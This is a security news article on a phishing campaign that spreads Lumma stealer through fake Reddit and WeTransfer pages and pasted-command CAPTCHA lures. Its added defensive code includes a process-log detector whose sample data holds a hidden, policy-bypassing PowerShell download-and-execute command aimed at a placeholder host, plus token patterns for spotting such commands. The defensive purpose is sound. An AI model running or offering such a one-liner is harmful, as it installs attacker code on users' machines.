Large-Scale Phishing Operation Deploys Lumma Stealer Through Fake Reddit and WeTransfer Pages

CyberSecureFox 🦊

Security researchers at Sekoia have uncovered an extensive phishing operation utilizing nearly 1,000 fraudulent websites that impersonate popular platforms Reddit and WeTransfer. The sophisticated campaign aims to distribute the dangerous Lumma stealer malware, putting users’ sensitive data at significant risk.

Sophisticated Social Engineering Tactics Revealed

The threat actors have deployed an intricate network of 529 counterfeit Reddit pages and 407 WeTransfer clone sites in this carefully orchestrated campaign. The fake Reddit pages feature convincingly crafted technical support discussions where automated accounts engage in seemingly legitimate conversations. This three-step deception involves one account posting a technical issue, another providing a WeTransfer link claiming to contain a solution, and a third account validating the effectiveness of the proposed fix.

Technical Analysis of Malicious Infrastructure

The investigation reveals distinct patterns in the attackers’ infrastructure. The malicious domains consistently incorporate legitimate brand names combined with random character strings, predominantly using .org and .net top-level domains. When users click the fraudulent WeTransfer links, they unknowingly trigger the download of the Lumma stealer malware from a command-and-control server hosted at weighcobbweo[.]top.
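The domain pattern described above (a real brand name plus random filler, mostly on .org and .net) lends itself to a simple triage heuristic for DNS or proxy logs. The following is an added example, not code from the article or from Sekoia: it scores each name on whether the brand appears outside the brand's own registrable domain, whether the remaining label looks random, and whether the TLD matches the campaign's preference. The brand table, the "last two labels" approximation of a registrable domain (no public-suffix list) and the sample domains are all assumptions constructed for this example; none of the sample names are indicators from the report.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Brands the campaign impersonates, mapped to the registrable domains they really use.
# Assumption for this example: only these two brands matter; extend for your own estate.
LEGIT_APEX = {
    "reddit": {"reddit.com", "redd.it"},
    "wetransfer": {"wetransfer.com", "we.tl"},
}
# TLDs the report says the campaign favoured.
SUSPECT_TLDS = {"org", "net"}


@dataclass
class DomainVerdict:
    domain: str
    brand: Optional[str]
    suspicious: bool
    reasons: List[str] = field(default_factory=list)


def _registrable(domain: str) -> str:
    """Last two labels of the name. Simplification: no public-suffix list,
    so names under 'co.uk'-style suffixes are not handled correctly."""
    return ".".join(domain.split(".")[-2:])


def _looks_random(label: str) -> bool:
    """Cheap 'random filler' test: digits, a low vowel ratio, or a long consonant run."""
    if any(ch.isdigit() for ch in label):
        return True
    vowels = sum(ch in "aeiouy" for ch in label)
    if vowels / max(len(label), 1) < 0.2:
        return True
    return re.search(r"[bcdfghjklmnpqrstvwxz]{4}", label) is not None


def assess_domain(domain: str) -> DomainVerdict:
    d = domain.lower().strip().rstrip(".")
    labels = d.split(".")
    tld = labels[-1]
    sld = labels[-2] if len(labels) >= 2 else ""
    brand = next((b for b in LEGIT_APEX if b in d), None)
    if brand is None:
        return DomainVerdict(d, None, False)
    if _registrable(d) in LEGIT_APEX[brand]:
        return DomainVerdict(d, brand, False, ["registrable domain belongs to the brand"])
    reasons = [f"'{brand}' appears outside the brand's own registrable domain"]
    # Whatever is left of the second-level label once the brand name is removed.
    filler = re.sub(r"[-_]", "", sld.replace(brand, ""))
    if len(filler) >= 4 and _looks_random(filler):
        reasons.append(f"random-looking filler '{filler}' in the registrable label")
    if tld in SUSPECT_TLDS:
        reasons.append(f".{tld} TLD, as favoured by the campaign")
    # Brand outside its apex is necessary; one more campaign trait makes it suspicious.
    return DomainVerdict(d, brand, len(reasons) >= 2, reasons)


def flag_lookalikes(domains: List[str]) -> List[str]:
    """Return the subset of domains the heuristic marks suspicious, in input order."""
    return [v.domain for v in map(assess_domain, domains) if v.suspicious]


# Constructed sample input: none of these are real indicators from the report.
SAMPLE_DOMAINS = [
    "reddit.com",
    "old.reddit.com",
    "reddit-k3qxv.org",        # brand + random filler + .org
    "reddit.xj9qpt.net",       # brand as a subdomain of a random registrable name
    "wetransfer-xq7tz.net",
    "wetransfer-support.org",  # word-like filler, but still off-brand on a .org
    "example.com",
]

if __name__ == "__main__":
    for name in SAMPLE_DOMAINS:
        verdict = assess_domain(name)
        print(f"{name:26} suspicious={verdict.suspicious}  {'; '.join(verdict.reasons)}")
```

The heuristic is deliberately tolerant of false positives (a legitimate partner site such as the constructed wetransfer-support.org is still flagged): it is a triage filter to feed a blocklist review or a SIEM enrichment, not a verdict on its own.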

Multi-Vector Distribution Strategy

According to Bleeping Computer’s analysis, the attackers employ multiple distribution channels to maximize their reach. These include malvertising campaigns, SEO poisoning techniques, and targeted phishing messages across social media platforms and messaging applications. The campaign’s sophistication is further evidenced by a parallel attack vector identified by Netskope Threat Labs, involving fake CAPTCHA systems in ClickFix-style attacks.

CAPTCHA-Based Attack Methodology

The cybercriminals leverage an advanced social engineering technique known as ClearFake or OneDrive Pastejacking. This method tricks users into manually executing malicious PowerShell commands under the guise of resolving display issues or completing CAPTCHA verification processes. This technique has gained significant traction among cybercriminal groups due to its effectiveness in bypassing traditional security measures.
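The pasted-command (ClickFix) step leaves a distinctive trace on the endpoint: the desktop shell itself (explorer.exe, via the Run box) becomes the parent of a scripting host whose command line carries hidden-window, policy-bypass, encoded or download-and-evaluate traits. The block below is an added example, not code from the article, Netskope or Sekoia. It parses a constructed key=value process-creation log (not any real EDR or Sysmon schema; the field names, hosts, users and the `example.invalid` staging URL are all invented for the example) and applies that parent-plus-traits rule, so that an administrator's PowerShell session and a scheduled task with a bypass flag are not alerted on while the pasted one-liner and an mshta.exe launch with a URL are.

```python
import re
from typing import Dict, List

# Constructed process-creation events in a simple key=value line format.
# This is not a real log schema; map the fields from your own EDR or Sysmon feed.
SAMPLE_EVENTS = [
    # A pasted ClickFix one-liner: explorer.exe (the Run box) spawning a hidden PowerShell.
    'ts=2025-01-20T10:01:02Z host=WS01 user=alice parent="C:\\Windows\\explorer.exe" '
    'image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'cmdline="powershell.exe -w hidden -ep bypass -nop -c iex(iwr http://stage.example.invalid/PLACEHOLDER)"',
    # Ordinary desktop activity.
    'ts=2025-01-20T10:05:44Z host=WS01 user=alice parent="C:\\Windows\\explorer.exe" '
    'image="C:\\Windows\\System32\\notepad.exe" cmdline="notepad.exe notes.txt"',
    # An admin at a console: PowerShell, but not launched from the shell/Run box.
    'ts=2025-01-20T10:07:10Z host=WS02 user=bob parent="C:\\Windows\\System32\\cmd.exe" '
    'image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'cmdline="powershell.exe -NoProfile -Command Get-Process"',
    # mshta.exe handed a URL straight from the Run box: another pasted-command variant.
    'ts=2025-01-20T10:09:31Z host=WS03 user=carol parent="C:\\Windows\\explorer.exe" '
    'image="C:\\Windows\\System32\\mshta.exe" cmdline="mshta.exe http://stage.example.invalid/PLACEHOLDER"',
    # Scheduled task with a bypass flag: worth its own rule, but not the ClickFix shape.
    'ts=2025-01-20T10:12:00Z host=WS04 user=dave parent="C:\\Windows\\System32\\svchost.exe" '
    'image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'cmdline="powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"',
]

KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line: str) -> Dict[str, str]:
    """Turn one key=value line into a dict; quoted values may contain spaces."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in KV_RE.finditer(line)}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


USER_SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
URL_LOLBINS = {"mshta.exe"}
# Command-line traits common to pasted one-liners; each is a Sigma-style token match.
SUSPECT_TOKENS = {
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "execution policy bypass": re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I),
    "encoded command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "invoke-expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "web download": re.compile(r"\b(?:iwr|invoke-webrequest|downloadstring|curl|wget)\b|https?://", re.I),
}


def detect_clickfix(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Alert on shell/LOLBin launches whose parent is the desktop shell and whose
    command line shows the pasted-command traits. Parent context is the key filter."""
    alerts = []
    for ev in events:
        parent = basename(ev.get("parent", ""))
        image = basename(ev.get("image", ""))
        cmd = ev.get("cmdline", "")
        if parent != "explorer.exe":
            continue  # interactive launch from the desktop/Run box is the precondition
        hits = [name for name, rx in SUSPECT_TOKENS.items() if rx.search(cmd)]
        if (image in USER_SHELLS and hits) or (image in URL_LOLBINS and "web download" in hits):
            alerts.append({"host": ev.get("host", "?"), "user": ev.get("user", "?"),
                           "image": image, "traits": ", ".join(hits)})
    return alerts


def scan(lines: List[str]) -> List[Dict[str, str]]:
    return detect_clickfix([parse_event(line) for line in lines])


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"{alert['host']} {alert['user']}: {alert['image']} [{alert['traits']}]")
```

In production the same rule is usually expressed as a Sigma or EDR query keyed on ParentImage and CommandLine; the parent-process condition is what keeps it quiet on administrators and scheduled jobs, and tightening the token list is where false negatives creep in, so review any explorer.exe-spawned scripting host, not only those matching every trait.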

To protect against these sophisticated threats, cybersecurity experts recommend implementing a multi-layered defense strategy. This includes maintaining updated antivirus software, enabling advanced email filtering, and conducting regular security awareness training for users. Organizations should particularly focus on educating employees about the dangers of executing unknown commands or downloading files from unverified sources, regardless of how legitimate they may appear. Additionally, implementing DMARC, SPF, and DKIM email authentication protocols can help prevent domain spoofing attempts associated with such phishing campaigns.
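Of the recommendations above, DMARC and SPF are the ones that can be checked mechanically from a DNS TXT record. The following is an added example, not code from the article: it parses a DMARC record and an SPF record and reports the settings that leave a domain spoofable (a monitoring-only `p=none`, partial `pct`, no aggregate reporting, a permissive `+all` or `?all`, and more than the ten DNS-querying terms RFC 7208 allows), with a weak record placed beside its enforcing counterpart. The records are constructed for a fictional example.com; DKIM is not covered because validating it needs the published key and a signed message, not just a record.

```python
import re
from typing import Dict, List

STRONG_POLICIES = {"quarantine", "reject"}
# RFC 7208 counts these mechanisms/modifiers toward the 10-DNS-lookup limit.
DNS_MECHANISMS = {"include", "a", "mx", "ptr", "exists", "redirect"}


def parse_dmarc(record: str) -> Dict[str, str]:
    """Split 'tag=value; tag=value' into a dict; tag names are case-insensitive."""
    tags: Dict[str, str] = {}
    for part in record.split(";"):
        part = part.strip()
        if not part:
            continue
        if "=" not in part:
            raise ValueError(f"malformed DMARC tag: {part!r}")
        key, value = part.split("=", 1)
        tags[key.strip().lower()] = value.strip()
    return tags


def assess_dmarc(record: str) -> List[str]:
    """Return human-readable weaknesses; an empty list means the record enforces."""
    tags = parse_dmarc(record)
    findings = []
    if tags.get("v", "").upper() != "DMARC1":
        findings.append("record does not start with v=DMARC1")
    policy = tags.get("p", "").lower()
    if policy not in STRONG_POLICIES:
        findings.append(f"p={policy or '<missing>'}: receivers take no action on spoofed mail")
    sub_policy = tags.get("sp", "").lower()
    if sub_policy and sub_policy not in STRONG_POLICIES and policy in STRONG_POLICIES:
        findings.append(f"sp={sub_policy}: subdomains can still be spoofed")
    pct = tags.get("pct", "100")
    if not pct.isdigit():
        findings.append(f"pct={pct!r} is not a number")
    elif int(pct) < 100:
        findings.append(f"pct={pct}: policy applied to only {pct}% of failing mail")
    if "rua" not in tags:
        findings.append("no rua= address: you will not see aggregate reports of spoofing attempts")
    return findings


def assess_spf(record: str) -> List[str]:
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return ["record does not start with v=spf1"]
    findings = []
    all_term = next((t for t in terms[1:] if t.lower().lstrip("+-~?") == "all"), None)
    if all_term is None:
        findings.append("no 'all' mechanism: unlisted senders are neutral, not rejected")
    else:
        qualifier = all_term[0] if all_term[0] in "+-~?" else "+"
        if qualifier in "+?":
            findings.append(f"'{all_term}': every sender passes SPF, so spoofing is trivial")
        elif qualifier == "~":
            findings.append("'~all' softfail: acceptable only with DMARC p=quarantine/reject behind it")
    lookups = sum(1 for t in terms[1:]
                  if re.split(r"[:/=]", t.lower().lstrip("+-~?"), 1)[0] in DNS_MECHANISMS)
    if lookups > 10:
        findings.append(f"{lookups} DNS-querying terms: exceeds RFC 7208's limit of 10, "
                        "evaluators return permerror")
    return findings


# Constructed records for a fictional example.com: the weak pair beside the enforcing pair.
WEAK_DMARC = "v=DMARC1; p=none; pct=50"
STRONG_DMARC = "v=DMARC1; p=reject; sp=reject; rua=mailto:dmarc-reports@example.com; adkim=s; aspf=s"
WEAK_SPF = "v=spf1 include:_spf.example.com +all"
STRONG_SPF = "v=spf1 include:_spf.example.com -all"

if __name__ == "__main__":
    for label, record, check in (("DMARC weak", WEAK_DMARC, assess_dmarc),
                                 ("DMARC strong", STRONG_DMARC, assess_dmarc),
                                 ("SPF weak", WEAK_SPF, assess_spf),
                                 ("SPF strong", STRONG_SPF, assess_spf)):
        print(f"{label}: {record}")
        for finding in check(record) or ["ok"]:
            print(f"  - {finding}")
```

To run it against a live domain, fetch the TXT records at `_dmarc.<domain>` and at the apex with your resolver of choice and pass the strings in; the checker itself stays offline. Note that the lookup count here is a static count of terms in one record, not a recursive evaluation of the included records, so a real evaluator can still hit the limit where this check does not.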
